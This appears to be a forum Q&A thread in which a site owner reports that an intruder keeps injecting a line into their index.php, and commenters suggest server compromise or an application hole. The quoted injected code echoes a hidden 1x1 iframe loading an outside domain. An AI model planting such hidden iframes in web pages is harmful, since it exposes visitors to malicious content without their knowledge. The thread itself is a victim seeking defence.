vote up 0 vote down star

someone is intruding in our site and putting following line in our main page (index.php):: In the following code bottom.php is our own file and the intruder is putting the "echo <iframe .... >;" line between our "include_once" code.

<?include_once('bottom.php'); echo "<iframe src=\"http://clydaib.net/?click=86B26\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; ?>

please help me out to prevent this trespassing.

1  
Either there's a hole in your site's code, or your server has been compromised. We can't really help you with the former without the full code, and questions about the latter belong on ServerFault.com instead of here. – Dav Aug 7 at 8:46
Belongs on serverfault. I would guess you're running some common php application which has security flaw. – Paul Dixon Aug 7 at 8:51
As an existing file is modified instead of being overwritten, it’s more likely that your server has been compromised. – Gumbo Aug 7 at 8:53
Have you checked the file permission of all your folders, especially uploads if you allow uploading? – Extrakun Aug 7 at 8:57

Browse other questions tagged or ask your own question.